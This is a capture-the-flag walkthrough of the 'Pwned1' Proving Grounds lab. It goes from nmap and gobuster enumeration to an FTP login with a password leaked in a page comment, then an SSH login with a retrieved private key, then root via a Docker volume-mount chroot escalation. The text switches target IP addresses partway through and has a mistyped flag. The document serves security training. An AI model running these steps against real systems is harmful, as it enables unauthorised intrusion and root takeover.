Pwned1 Walkthrough (Proving Grounds) — Root Access via FTP and Docker Privilege Escalation
This guide provides a walkthrough for the “Pwned1” box, focusing on reconnaissance, enumeration, exploitation, and privilege escalation to root using FTP credentials and Docker. Let’s dive in.
Step 1: Initial Scanning with Nmap
Start by scanning the target IP (192.168.172.95) for open ports:
nmap 192.168.172.95
The scan reveals that ports 21 (FTP), 22 (SSH), and 80 (HTTP) are open. To gather further information on these ports, use the following command:
sudo nmap -p 21,22,80 192.168.172.95 -sC -sV -O -o nmap_scan.txt
Scan Results:
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open http Apache httpd 2.4.38 ((Debian))
The HTTP title on port 80 reads “Pwned….!!”, which hints at potential clues or content for further exploration.
Step 2: Web Directory Enumeration with Gobuster
To discover hidden directories on the web server, run a Gobuster scan:
gobuster dir -u http://192.168.172.95/ -w common.txt -t 50Gobuster Results:
/index.html
/robots.txt
/hidden_text/secret.dic
/pwned.vuln
The robots.txt file contains the following:
User-agent: *
Allow: /nothing
Allow: /hidden_text
Inside /hidden_text, there’s a secret.dic file with additional directories, including /pwned.vuln.
Step 3: FTP Credentials Discovery
Upon inspecting the source code of `http://192.168.172.95/pwned.vuln`, we find FTP credentials in the comments:
// if ($un==’ftpuser’ && $pw==’B0ss_Pr!ncesS’) {
Step 4: FTP Login and File Retrieval
Login to the FTP server using these credentials:
ftp 192.168.214.95
Navigate through the directories and find “id_rsa” (an SSH private key) and “note.txt”. Download these files to your local machine for further analysis.
Setting permissions for id_rsa
chmod 600 id_rsaReading note.txt
cat note.txt
The note reveals a potential user, “Ariana.” Use the “id_rsa” file to attempt an SSH connection as “Ariana.”
Step 5: SSH Login and Shell Stabilization
ssh -i id_rsa ariana@192.168.214.95
User flag here /^\
Once logged in, stabilize the shell:
python3 -c 'import pty; pty.spawn("/bin/bash")'Step 6: Privilege Escalation via Docker
Check the `id` command to see group memberships:
idIf “Ariana” is part of the “docker” group, this allows for potential privilege escalation. List available Docker images:
docker imagesRun a Docker container with “chroot” to access the root filesystem:
docker run -v /:/mnt - rm -it alpine chroot /mnt sh
python3 -c 'import pty; pty.spawn("/bin/bash")'Final Steps: Accessing Root Files
With root access, navigate to the root directory:
cd /root/
ls
cat root.txt
cat proof.txt
